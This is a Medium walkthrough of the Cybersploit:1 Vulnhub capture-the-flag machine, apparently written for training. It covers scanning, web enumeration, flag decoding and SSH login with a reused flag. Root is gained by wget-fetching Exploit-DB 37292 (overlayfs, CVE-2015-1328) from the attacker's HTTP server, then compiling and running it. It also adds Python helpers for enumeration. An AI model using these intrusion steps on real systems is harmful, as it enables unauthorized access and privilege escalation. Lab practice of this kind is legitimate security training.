medium.com

Cybersploit :1 vulnhub walkthrough

Anshika


Table of Contents

  1. Introduction
  2. Step 1: Host Discovery
  3. Step 2: Aggressive Network Scanning
  4. Step 3: Web Application Enumeration
  5. Step 4: SSH Access
  6. Step 5: Privilege Escalation
  7. Conclusion

Introduction

Cybersploit:1 is a vulnerable machine hosted on Vulnhub, designed to give practical experience in penetration testing. This walkthrough goes through each step needed to compromise the target and retrieve its three flags: one on the web server, one in a user's home directory, and one in /root.

Step 1: Host Discovery

First, we need to identify the IP address of the target machine on our network. This can be done with netdiscover, which works by sending ARP probes, so it only finds hosts on the same local segment as the attacking machine. That is fine here, since both VMs are on the same 192.168.1.0/24 lab network.

netdiscover


After running the scan, we identify the target’s IP as 192.168.1.14.

Step 2: Aggressive Network Scanning

To gather detailed information about the target machine, we run nmap in aggressive mode (-A), which adds OS detection, service version detection, default NSE script scanning and traceroute on top of the port scan. Note that without a -p option nmap only probes its 1,000 most common TCP ports, so a service on an unusual port would be missed; if the first scan looks too quiet, a follow-up nmap -p- 192.168.1.14 covers the full range.

nmap -A 192.168.1.14


The scan shows that only two ports are open on the target machine:

  • Port 22: SSH Service
  • Port 80: HTTP Service

These open ports will be crucial in further exploration of the target machine.

Step 3: Web Application Enumeration

Given that port 80 is open, we start our enumeration by exploring the web application hosted on the target machine. Opening the IP address in a browser displays a basic webpage.


To dig deeper, we use dirb to enumerate possible files and directories on the web server:

dirb http://192.168.1.14/


Output:

The dirb scan returns a list of files and directories found on the web server. One of them stands out: robots.txt.

Investigation of robots.txt:

The robots.txt file is used to tell web crawlers which paths they should not index. Because it has to be world-readable for crawlers to use it, it often discloses paths or data the administrator meant to keep quiet, which makes it one of the first files worth reading during enumeration.

  1. Access robots.txt:
  • Open http://192.168.1.14/robots.txt in a browser.
  2. Content analysis:
  • The file contains a string that appears to be Base64-encoded: only the characters A-Z, a-z, 0-9, + and /, padded with = to a multiple of four characters.
  3. Decoding Base64:
  • We decode the Base64 string to reveal our first flag.


Decoding the string reveals our first flag:

Flag 1: cybersploit{youtube.com/c/cybersploit}

Step 4: SSH Access

While exploring the HTML source code of the web page, we find an interesting piece of information hidden in the comments: a username.

Username Discovery:

  • SSH User: itsskv
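The comment was found by reading the page source by hand. The script below automates that step for any page: it pulls every HTML comment out of the source and flags the ones that look like a Unix login name. This is an added example, not code from the original walkthrough; the sample page embedded in it is constructed for the demonstration and is not the real Cybersploit:1 index page, and the username heuristic (a single lowercase token of login-name shape) is my own choice.

```python
"""Pull HTML comments out of a page's source, as done by hand in the walkthrough.

Added example; not code from the original article. SAMPLE_HTML is a constructed
page, not the target's real source.
"""
import re
import sys
import urllib.request
from html.parser import HTMLParser
from typing import Dict, List


class CommentCollector(HTMLParser):
    """HTMLParser subclass that records every <!-- ... --> comment it sees."""

    def __init__(self) -> None:
        super().__init__()
        self.comments: List[str] = []

    def handle_comment(self, data: str) -> None:
        self.comments.append(data)


def extract_comments(html: str) -> List[str]:
    """Return the text of each HTML comment, with surrounding whitespace and
    decorative dashes stripped (authors often pad comments with '-----')."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return [c.strip(" \t\r\n-") for c in parser.comments]


def candidate_usernames(comments: List[str]) -> List[str]:
    """Heuristic (my assumption, not a rule): a comment that is one lowercase
    token of the shape a Unix login name usually has is worth trying over SSH."""
    token = re.compile(r"^[a-z_][a-z0-9_-]{2,31}$")
    return [c for c in comments if token.match(c)]


# Constructed sample page (not the target's real source) with the kind of
# comments that leak a username.
SAMPLE_HTML = """<html><head><title>Hello Pentester!</title></head>
<body>
<!-- good work ! Thanks for visiting me -->
<h1>Welcome</h1>
<!----------------------------itsskv---------------------------->
</body></html>"""


def enumerate_page(html: str) -> Dict[str, List[str]]:
    """Collect comments and the username candidates found in them."""
    comments = extract_comments(html)
    return {"comments": comments, "usernames": candidate_usernames(comments)}


if __name__ == "__main__":
    # Usage: python3 comments.py http://192.168.1.14/   (no argument: sample page)
    if len(sys.argv) > 1:
        with urllib.request.urlopen(sys.argv[1], timeout=10) as resp:
            page = resp.read().decode("utf-8", errors="replace")
    else:
        page = SAMPLE_HTML
    print(enumerate_page(page))
```

Running it against the sample page yields the comment text and a single username candidate, itsskv. Against a real target it only sees the HTML of the one URL given; comments in included JavaScript or CSS files would need those files fetched as well.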


Given that the SSH service (port 22) is open and we now have a valid username, we attempt to log in over SSH. We do not have a password, but the first flag is the only credential-like string we have found, and CTF machines frequently reuse a flag as the next password, so we try it. A wrong guess costs nothing on a lab box; on a real engagement repeated failures can trigger lockouts or alerting, so guesses should be deliberate rather than sprayed.

SSH Login Attempt:

ssh itsskv@192.168.1.14

Password: cybersploit{youtube.com/c/cybersploit}


Success:

The SSH login is successful, and we now have access to the target machine as the user itsskv.

Post-Login Enumeration:

  1. List directory contents:
  • We begin by listing the contents of the home directory with ls.
  2. Discovery of flag2.txt:
  • Among the files in the directory, we find flag2.txt.
  3. Read flag2.txt:
  • We use cat to view the contents of flag2.txt.

ls

cat flag2.txt


Output:

The contents of flag2.txt are not plain text: the file is a long string of 0s and 1s. Splitting it into 8-bit groups and converting each group to its ASCII character (a binary-to-text decoder) gives the flag.


Flag 2:

cybersploit{https:t.me/cybersploit1}
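Both flags so far were found encoded, once as Base64 in robots.txt and once as binary octets in flag2.txt. The decoder below handles both, guessing the encoding from the character set and trying binary first (a string of 0s and 1s is also valid Base64 alphabet, so the order matters). It is an added example, not code from the original walkthrough; the two sample inputs are constructed here to encode the flags the article reports and are not copies of the files on the target, and the cybersploit{...} flag pattern is taken from the flags on this page.

```python
"""Decode the two flag encodings met on this box: Base64 (robots.txt) and a
string of 8-bit binary groups (flag2.txt).

Added example, not code from the original walkthrough. ROBOTS_TXT_SAMPLE and
FLAG2_TXT_SAMPLE are constructed to match the reported flags.
"""
import base64
import binascii
import re
from typing import List, Tuple

FLAG_RE = re.compile(r"cybersploit\{[^}]*\}")
BINARY_RE = re.compile(r"^[01]+$")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed sample: the first flag as it would appear Base64-encoded in robots.txt.
ROBOTS_TXT_SAMPLE = "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0="

# Constructed sample: the second flag written as space-separated binary octets.
FLAG2_TXT_SAMPLE = (
    "01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 "
    "01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 "
    "01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 "
    "01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 "
    "01101001 01110100 00110001 01111101"
)


def decode_binary(text: str) -> str:
    """Turn '01100011 01111001 ...' into text. Whitespace is ignored, so the
    groups may be separated by spaces, newlines or nothing at all."""
    bits = re.sub(r"\s", "", text)
    if not bits or len(bits) % 8:
        raise ValueError("bit string length is not a multiple of 8")
    octets = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
    return octets.decode("ascii")


def decode_base64(text: str) -> str:
    """Strict Base64 decode; validate=True rejects stray characters instead of
    silently skipping them, which would mask a wrong guess about the encoding."""
    return base64.b64decode(text, validate=True).decode("utf-8")


def decode_flag(text: str) -> Tuple[str, str]:
    """Guess the encoding of a blob found during enumeration and decode it.

    Returns (encoding, plaintext) with encoding one of 'binary', 'base64' or
    'plain'. A candidate that fails to decode cleanly falls through to the
    next guess rather than producing garbage.
    """
    compact = re.sub(r"\s", "", text)
    if BINARY_RE.match(compact):
        try:
            return "binary", decode_binary(compact)
        except (ValueError, UnicodeDecodeError):
            pass
    if BASE64_RE.match(compact) and len(compact) % 4 == 0:
        try:
            return "base64", decode_base64(compact)
        except (binascii.Error, UnicodeDecodeError):
            pass
    return "plain", text.strip()


def find_flags(text: str) -> List[str]:
    """Return every cybersploit{...} token in already-decoded text."""
    return FLAG_RE.findall(text)


if __name__ == "__main__":
    for sample in (ROBOTS_TXT_SAMPLE, FLAG2_TXT_SAMPLE):
        encoding, plaintext = decode_flag(sample)
        print(encoding, find_flags(plaintext))
```

The same function works on a file pulled from the target (for example the body of http://192.168.1.14/robots.txt or the text cat'ed from flag2.txt), and find_flags lets you grep decoded output for the flag format without reading it by eye.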

With the second flag in hand, we now focus on escalating our privileges to root.

Step 5: Privilege Escalation

Privilege escalation is the process of gaining higher-level permissions on a system, typically to achieve root access. We start by checking the kernel version of the target machine, which could potentially expose vulnerabilities.

Kernel Version Check:

uname -a


Output:

The output shows the exact kernel release and the distribution build it came from (the same string that uname -r prints on its own). Older releases like this one often have public local privilege escalation exploits, so the release string is what we search for next.

Researching Exploits:

Using the kernel release from uname -a, we search for known exploits that target it. A search on Exploit-DB (or searchsploit, its offline copy, where available) returns several candidates.


Selected Exploit:

We choose the exploit whose advertised kernel range covers the target. It is Exploit-DB ID 37292, published as the file 37292.c: a local privilege escalation through the overlayfs filesystem (CVE-2015-1328) affecting Ubuntu kernels from 3.13.0 up to, but not including, 3.19. Before running any kernel exploit on a target, take a VM snapshot: a failed attempt can panic the kernel and take the machine down.
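Matching a kernel release against an exploit's advertised range is easy to get wrong by eye when several candidates turn up, so the helper below does it from the uname output. It is an added example, not code from the original walkthrough: the uname line is a constructed sample (the article does not reproduce the target's output), and the catalogue holds only the one entry used here, with the range taken from the Exploit-DB title of 37292.

```python
"""Match the kernel release from `uname -a` against the kernel range an
exploit advertises, before spending time compiling it on the target.

Added example; not code from the original walkthrough. SAMPLE_UNAME is a
constructed line, and CATALOGUE is a one-entry illustration, not a database.
"""
import re
from typing import List, NamedTuple, Optional, Tuple

Version = Tuple[int, int, int]


class Candidate(NamedTuple):
    edb_id: int
    title: str
    min_inclusive: Version
    max_exclusive: Version


# Exploit-DB 37292 is titled "Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/
# 14.10/15.04) - 'overlayfs' Local Privilege Escalation" (CVE-2015-1328).
CATALOGUE: List[Candidate] = [
    Candidate(37292, "overlayfs local privilege escalation (CVE-2015-1328)",
              (3, 13, 0), (3, 19, 0)),
]

# Constructed sample of what `uname -a` prints on an Ubuntu 3.13 kernel; this
# is not the target's real output.
SAMPLE_UNAME = ("Linux cybersploit 3.13.0-32-generic #57~precise1-Ubuntu SMP "
                "Tue Jul 15 03:50:54 UTC 2014 i686 i686 i686 GNU/Linux")


def parse_kernel_version(uname_output: str) -> Optional[Version]:
    """Pull (major, minor, patch) out of `uname -a` or `uname -r` output.
    The distro suffix (-32-generic) is deliberately left out of the tuple."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", uname_output)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)))


def in_range(version: Version, lo: Version, hi: Version) -> bool:
    """Half-open comparison: lo <= version < hi. Tuple ordering does the
    right thing for 3.13.0 vs 3.19.0 (unlike comparing the strings)."""
    return lo <= version < hi


def matching_exploits(uname_output: str,
                      catalogue: List[Candidate] = CATALOGUE) -> List[int]:
    """Return the Exploit-DB IDs whose advertised range covers this kernel."""
    version = parse_kernel_version(uname_output)
    if version is None:
        return []
    return [c.edb_id for c in catalogue
            if in_range(version, c.min_inclusive, c.max_exclusive)]


if __name__ == "__main__":
    print(parse_kernel_version(SAMPLE_UNAME), matching_exploits(SAMPLE_UNAME))
```

A version match is necessary but not sufficient: Ubuntu backports fixes without changing the upstream 3.13.0 number, so the ABI part of the release string (-32 here) and the distribution list in the exploit's title decide whether the target is actually unpatched. The exploit must also be compiled on the target, so gcc has to be present there, which on this box it is.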


Exploit Execution:

  1. Download the exploit:
  • After reviewing the source with cat, we host a simple HTTP server on our attacking machine (192.168.1.8) so the target can fetch the file.

cat 37292.c

python3 -m http.server 8080



Download the Exploit on Target Machine:

wget http://192.168.1.8:8080/37292.c


Compile the Exploit:

  • The exploit is written in C, so we compile it with gcc on the target machine (gcc is installed there; with no -o flag the resulting binary is named a.out).

ls

gcc 37292.c

ls

Run the Exploit:

  • Execute the compiled binary to attempt privilege escalation.

./a.out

whoami

Success:

The exploit successfully escalates our privileges to root.


Final Flag:

With root access, we move to /root (the root user's home directory) and retrieve the final flag:

cd /root

ls

cat finalflag.txt


Final Flag: Retrieved successfully.

Conclusion

This walkthrough detailed the process of exploiting the Cybersploit:1 machine on Vulnhub. We started with network scanning to identify open services, then moved on to web application enumeration, where we uncovered important clues leading to SSH access. Finally, we escalated our privileges by exploiting a known vulnerability in the kernel, ultimately gaining root access and retrieving all the flags. This exercise highlights the importance of systematic enumeration, persistence, and the ability to leverage known vulnerabilities in achieving penetration testing goals.

Thank you for reading!!